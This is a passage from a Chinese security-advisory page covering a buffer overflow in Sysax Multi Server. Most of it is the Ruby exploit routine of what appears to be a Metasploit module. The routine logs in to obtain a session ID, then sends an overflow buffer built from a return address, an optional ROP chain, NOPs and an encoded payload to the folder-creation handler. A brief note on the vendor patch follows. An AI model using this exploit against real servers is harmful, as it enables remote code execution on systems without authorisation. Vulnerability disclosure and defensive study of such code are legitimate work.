Sysax Multi Server函数缓冲区溢出漏洞(3)

def exploit
        
        user = datastore['SysaxUSER']
        pass = datastore['SysaxPASS']
        
        #base64 encode the credentials
        encodedcreds = Base64.encode64(user+"\x0a"+pass)
        creds = "fd="+encodedcreds

connect

# Login to get SID value
        print_status "Getting SID from #{target_url}"
        res = send_request_raw({
            'method'=> 'POST',
            'uri'   => "#{target_url}/scgi?sid=0&pid=dologin",
            'data'  => creds
        },20)
        
        #parse response for SID token
        sid = res.body.match (/(sid=[A-Z0-9a-z]{40})/)
        print_status "Your " + sid.to_s

buffer = rand_text(target['Offset'])
        buffer << [target.ret].pack('V')

if (target['Rop'])
            buffer << [target['Nop']].pack('V')*16
            buffer << create_rop_chain()
        end

buffer << make_nops(15)
        buffer << payload.encoded #max 1299 bytes
        
        #pwnag3 post data
        post_data = "scgi?"+sid.to_s+"&pid=mk_folder2_name1.htm HTTP/1.1\r\n"
        post_data << "Content-Length: 171\r\n\r\n"
        post_data << "-----------------------------1190753071675116720811342231\r\n"
        post_data << "Content-Disposition: form-data; name=\"e2\"\r\n\r\n"
        post_data << buffer+"\r\n"
        post_data << "-----------------------------1190753071675116720811342231--\r\n\r\n"
        
        referer = "http://"+datastore['RHOST'].to_s+"/scgi?"+sid.to_s+"&pid=mk_folder1_name1.htm"
                
        send_request_raw({
            'uri'     => "/" + post_data,
            'version' => '1.1',
            'method'  => 'POST',
            'referer' => referer
        })

handler
        disconnect

end
end

建议:
--------------------------------------------------------------------------------
厂商补丁:

sysax
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wypfpj.html